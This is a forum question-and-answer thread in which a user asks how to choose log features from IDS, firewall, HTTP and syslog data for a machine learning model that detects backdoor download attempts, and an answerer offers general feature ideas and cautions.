2

I was reading a document about logging and analysis. The document talks about statistical analysis and machine learning techniques to detect some attack scenarios. For instance, If you want to detect a Possible Brute Force Log-in, you might want to look at the following features:

  • Firewall Accepts, Multiple Failed Logins in a Row, At Least 1 Successful Login.

What is interesting for me is that these features are collected from different sources (Firewall, Source machine). I have a use-case where I am interested in detecting attacks that try to download and install backdoors. I have logs collected from IDS, Firewall, HTTP server and a Syslog server. I want to find some indicative feature that I can feed to my Machine learning Model. The problem for me is shown in the picture below:

enter image description here

This fellow researcher manually analyzed the logs and provided some useful insights. But he only used on source machine (Http). Specifically, the data field in these logs.

Does this mean that backdoors are hard detect by security devices? What if I want to use other features, as shown in the brute force example, to detect backdoors in an automated manner, what would you propose ?

PS: I only want some general ideas about these features. I know that backdoor detection can be hard. Fortunately, I only have to study the backdoor in the dataset I have x).

Bests.

U. User
  • 180
  • 8

1 Answers1

1

In general security systems that use a machine learning approach are based on features, metrics or characteristics. Depending on the area (Anti-Virus, Anti-spam, NIDS) the characteristics are different. For example: In the area of Spam the subject will be a key characteristic as well as if the message have an attachment and the attachment could contain another file (zip, tar files). On the other hand, in the area of Anti-virus some of the characteristics could be the file type, some specific strings inside the binary, syscalls used and so on. And as you can guest for a NIDS the features could be completely different, packets up, TCP push, HTTP messages, URI content, and so on.

In general that type of articles are very dependent of the data-set used, so is easy for the authors fiddle a bit the results on them. Bear in mind that when this systems have false positives they need to find another characteristics that could differentiate with the false positive and this sometimes is hard to do it.

In the case of the back-doors you need to study the characteristics and the behavior of some of them and create your own characteristics, probably a network traffic features in combination of normal malware could be a good approach for start.

camp0
  • 2,172
  • 1
  • 10
  • 10
  • Yeah, but according to the picture, the authors only using the Web server logs, and only the data (or message) field in the logs, to say that the attack tried to download and install the backdoor. So, I am a little confused about the next step: should I try to come up with a machine learning/data mining approach so study only message field in the logs, or should I combine it with other features likes you've suggested (Ip addresses, network traffic features,.. etc.) ? – U. User Feb 23 '19 at 12:14